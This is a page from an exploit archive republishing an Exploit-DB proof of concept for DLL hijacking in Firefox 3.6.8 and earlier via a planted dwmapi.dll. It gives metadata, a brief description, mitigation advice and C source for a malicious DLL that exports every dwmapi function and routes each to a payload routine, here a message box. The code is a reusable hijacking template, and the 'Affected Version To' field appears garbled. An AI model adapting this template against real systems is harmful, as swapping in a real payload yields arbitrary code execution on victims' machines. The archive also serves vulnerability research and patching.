Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Firefox - exploit.company
header-logo
Suggest Exploit
vendor:
Firefox
by:
Glafkos Charalambous
7.5
CVSS
HIGH
DLL Hijacking
427
CWE
Product Name: Firefox
Affected Version From: <= 3.6.8
Affected Version To: 3.6.2008
Patch Exists: NO
Related CWE:
CPE: a:mozilla:firefox
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3
2010

Firefox <= 3.6.8 DLL Hijacking Exploit [dwmapi.dll]

This exploit allows an attacker to hijack the dwmapi.dll file in Firefox version 3.6.8 or earlier. The vulnerable extensions are .htm, .html, .jtx, and .mfp. By exploiting this vulnerability, an attacker can execute arbitrary code on the victim's system.

Mitigation:

Update Firefox to a version higher than 3.6.8 and avoid opening untrusted files with the vulnerable extensions.
Source

Exploit-DB raw data:

/* 
Exploit Title: Firefox <= 3.6.8 DLL Hijacking Exploit [dwmapi.dll]
Date: August 24, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: Latest Firefox v3.6.8
Tested on: Windows XP SP3 En
Vulnerable extensions: .htm .html .jtx .mfp
Greetz: Astalavista, OffSEC, Exploit-DB
*/


#include <windows.h>
#define DllExport __declspec (dllexport)

DllExport void CPAcquireContext() { pwn(); }
DllExport void DWMAPI_100() { pwn(); }
DllExport void DWMAPI_101() { pwn(); }
DllExport void DwmEnableComposition() { pwn(); }
DllExport void DWMAPI_103() { pwn(); }
DllExport void DWMAPI_104() { pwn(); }
DllExport void DWMAPI_105() { pwn(); }
DllExport void DWMAPI_106() { pwn(); }
DllExport void DWMAPI_107() { pwn(); }
DllExport void DWMAPI_108() { pwn(); }
DllExport void DWMAPI_109() { pwn(); }
DllExport void DWMAPI_110() { pwn(); }
DllExport void DWMAPI_111() { pwn(); }
DllExport void DWMAPI_112() { pwn(); }
DllExport void DWMAPI_113() { pwn(); }
DllExport void DWMAPI_115() { pwn(); }
DllExport void DWMAPI_116() { pwn(); }
DllExport void DWMAPI_117() { pwn(); }
DllExport void DWMAPI_118() { pwn(); }
DllExport void DWMAPI_119() { pwn(); }
DllExport void DWMAPI_120() { pwn(); }
DllExport void DwmAttachMilContent() { pwn(); }
DllExport void DwmDefWindowProc() { pwn(); }
DllExport void DwmDetachMilContent() { pwn(); }
DllExport void DwmEnableBlurBehindWindow() { pwn(); }
DllExport void DwmEnableMMCSS() { pwn(); }
DllExport void DwmExtendFrameIntoClientArea() { pwn(); }
DllExport void DwmFlush() { pwn(); }
DllExport void DwmGetColorizationColor() { pwn(); }
DllExport void DwmGetCompositionTimingInfo() { pwn(); }
DllExport void DwmGetGraphicsStreamClient() { pwn(); }
DllExport void DwmGetGraphicsStreamTransformHint() { pwn(); }
DllExport void DwmGetTransportAttributes() { pwn(); }
DllExport void DwmGetWindowAttribute() { pwn(); }
DllExport void DwmIsCompositionEnabled() { pwn(); }
DllExport void DwmModifyPreviousDxFrameDuration() { pwn(); }
DllExport void DwmQueryThumbnailSourceSize() { pwn(); }
DllExport void DwmRegisterThumbnail() { pwn(); }
DllExport void DwmSetDxFrameDuration() { pwn(); }
DllExport void DwmSetPresentParameters() { pwn(); }
DllExport void DwmSetWindowAttribute() { pwn(); }
DllExport void DwmUnregisterThumbnail() { pwn(); }
DllExport void DwmUpdateThumbnailProperties() { pwn(); }

int pwn()
{
  MessageBox(0, "Firefox DLL Hijacking!", "DLL Message", MB_OK);
  return 0;
}

Navigation

Suggest Exploit

Services By CQR